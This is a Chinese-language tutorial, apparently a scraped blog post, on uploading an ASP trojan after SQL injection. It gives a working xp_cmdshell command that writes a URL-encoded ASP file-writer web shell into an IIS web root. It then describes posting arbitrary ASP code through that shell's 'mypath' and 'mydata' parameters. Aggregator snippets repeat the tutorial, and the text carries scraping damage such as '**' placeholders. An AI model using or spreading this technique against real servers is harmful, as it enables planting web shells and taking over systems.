sql注入後,如何上傳木馬,一直是比較頭疼的事,我這裡提供上傳木馬的一種另一種方法。
1、sql注入的時候,用xp_cmdshell 向伺服器上寫入乙個能寫檔案的asp檔案。
檔案內容:
<%
set objfso = server.createobject
("scripting.filesystemobject")
set objcountfile=objfso.createtextfile
(request("mypath"),true)
objcountfile.write request("mydata")
objcountfile.close
%>
這個檔案可以寫成一行
<%set objfso = server.createobject
("scripting.filesystemobject"):
set objcountfile=objfso.createtextfile
(request("mypath"),true):objcountfile.write request("mydata"):
objcountfile.close%>
將特殊字元進行編碼 就可以得到
%3c%25set%20objfso%20=%20server.createobject
(%22scripting.filesystemobject%22):
set%20objcountfile=objfso.createtextfile(request(%22mypath%22),true):
objcountfile.write%20request(%22mydata%22):objcountfile.close%25%3e
注入(這裡假定web目錄是c:\inetpub\wwwroot\):
exec master..xp_cmdshell 'echo
"%3c%25set%20objfso%20=%20server.createobject
(%22scripting.filesystemobject%22):
set%20objcountfile=objfso.createtextfile
(request(%22mypath%22),true):
objcountfile.write%20request(%22mydata%22):
objcountfile.close%25%3e" > c:\inetpub\wwwroot\ftp.asp';
這樣 在伺服器的web 目錄下 將生成乙個 ftp.asp檔案
該檔案的**為
<%
set objfso = server.createobject
("scripting.filesystemobject")
set objcountfile=objfso.createtextfile
(request("mypath"),true)
objcountfile.write request
("mydata")
objcountfile.close
%>
你可以看到,上面**中預留了兩個介面 mypath 和 mydata
mypath是下次提交的時候 檔案的生成路徑
mydata是檔案的內容
在本地編寫乙個客戶端檔案 例:rohuclient.htm **如下
在目標位置欄填上剛剛生成的ftp.asp檔案的url位址
如 (這裡假設伺服器的ip是 127.0.0.1)
在生成檔案欄 輸入將在伺服器上生成的檔名 比如:c:\inetpub\wwwroot\server.asp
在檔案內容裡 ,隨意的貼上乙個asp**
點遞交,當 檔案執行完畢 基本上伺服器上的asp木馬就生成了。
SQL注入與ASP木馬上傳
sql注入後,如何上傳木馬,一直是比較頭疼的事,我這裡提供上傳木馬的一種另一種方法。1 sql注入的時候,用xp cmdshell 向伺服器上寫入乙個能寫檔案的asp檔案。檔案內容 set objfso server.createobject scripting.filesystemobject s...
SQL注入木馬
sql注入後,如何上傳木馬,一直是比較頭疼的事,我這裡提供上傳木馬的一種另一種方法。1 sql注入的時候,用xp cmdshell 向伺服器上寫入乙個能寫檔案的asp檔案。檔案內容 set objfso server.createobject scripting.filesystemobject s...
有效防止ASP木馬上傳執行 小知識 網路安全技術
一般現今asp木馬常通過以下四點來操作伺服器,所以我們只要將一下四處設定好就能從一 前使用iis伺服器的站長很多,特別是對於asp 來說,防止www.cppcns.comasp木馬成了 安全最關鍵的內容。一般現今asp木馬常通過以下四點來操作伺服器,所以我們只要將一下四處設定好就能從一定程度上有效防...